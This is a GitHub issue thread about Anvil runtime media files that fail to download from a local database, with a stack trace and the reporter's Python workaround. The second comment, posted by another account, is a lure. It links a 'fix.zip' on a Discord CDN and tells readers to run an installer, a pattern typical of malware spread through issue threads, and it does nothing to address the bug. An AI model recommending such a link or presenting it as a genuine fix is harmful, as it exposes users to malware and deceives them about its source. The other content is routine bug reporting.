### ISSUE TITLE
Media object from database can not be downloaded

### ISSUE THREAD

**Issue by MichalH1521** [anvil-works/anvil-runtime#91]
**Describe the bug**
My app saves some files into the database using Media type columns. Using the online version of the app, everything works as expected. However, when I run the app localy using one docker to run the app and another one to provide local postgres database, every time I try to download the media file, I get "Internal server error: 1271fb8154e0" with randomly generated error number. Neither pdf-s, nor images can be downloaded.

I've tried to download the files in two different ways - using mediaObject url and using anvil.media.download(file) method.
Also, when trying to show files saved within the database setting the src of an Image component to anvilMedia.url, nothing is shown, except for an error in browser console that that particular resource is not available.

The only useful error log that I could get is the following:
```
2024-09-03 15:14:19 [ERROR anvil.runtime.server] Error getting lazy media: 1271fb8154e0
2024-09-03 15:14:19 java.lang.IllegalArgumentException: No implementation of method: :id-when-persisted of protocol: #'anvil.runtime.sessions/ISession found for class: nil
2024-09-03 15:14:19     at clojure.core$_cache_protocol_fn.invokeStatic(core_deftype.clj:584)
2024-09-03 15:14:19     at clojure.core$_cache_protocol_fn.invoke(core_deftype.clj:576)
2024-09-03 15:14:19     at anvil.runtime.sessions$fn__268$G__198__273.invoke(sessions.clj:43)
2024-09-03 15:14:19     at anvil.runtime.sessions$with_app_session$fn__577.invoke(sessions.clj:478)
2024-09-03 15:14:19     at anvil.core.ring.util$wrap_async$fn__23201$fn__23209.invoke(util.clj:37)
2024-09-03 15:14:19     at anvil.core.ring.util$wrap_async$fn__23201$fn__23220.invoke(util.clj:43)
2024-09-03 15:14:19     at anvil.core.ring.util$wrap_async$inner_handler__23226$send_BANG___23227.invoke(util.clj:53)
2024-09-03 15:14:19     at anvil.core.ring.util$wrap_async$inner_handler$reify__23230.send_BANG_(util.clj:62)
2024-09-03 15:14:19     at anvil.runtime.server$serve_lazy_media$fn__26154$fn__26155.invoke(server.clj:119)
2024-09-03 15:14:19     at clojure.lang.AFn.run(AFn.java:22)
2024-09-03 15:14:19     at anvil.core.worker_pool$run_one_task_BANG_.invokeStatic(worker_pool.clj:55)
2024-09-03 15:14:19     at anvil.core.worker_pool$run_one_task_BANG_.invoke(worker_pool.clj:38)
2024-09-03 15:14:19     at anvil.core.worker_pool$launch_thread_BANG_$fn__5542.invoke(worker_pool.clj:94)
2024-09-03 15:14:19     at clojure.lang.AFn.run(AFn.java:22)
2024-09-03 15:14:19     at java.lang.Thread.run(Thread.java:750)
```

**Additional info**
The app is run localy on my computer and accessed through localhost:3030 exposed from within docker.

**To Reproduce**
Steps to reproduce the behaviour (including a clone link when applicable):
1. Clone this app: [Test_runtime_media](https://anvil.works/build#clone:MS4S626JNLV45ZSA=HK7BJTGJDBSGSR2TPP2YKMQR)
2. Make local clone of the app
3. Run it using local anvil-runtime
4. Upload any file using the file loader
5. Click on datagrid row to download uploaded file

Am I doing something wrong? Or is this expected behavior?

**Comment by Dominic54321** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by MichalH1521** [comment]
Okay, I may have found a workaround for this. I do not like this solution very much but changing the file download algorithm to the following code seemed to work:

```python
def download_file(self, **event_args):
    db_file = self.item['file'] # Instance of the file loaded from database
    file = anvil.BlobMedia(content_type=db_file.content_type, content=db_file.get_bytes(), name=db_file.name)
    anvil.media.download(file)
```
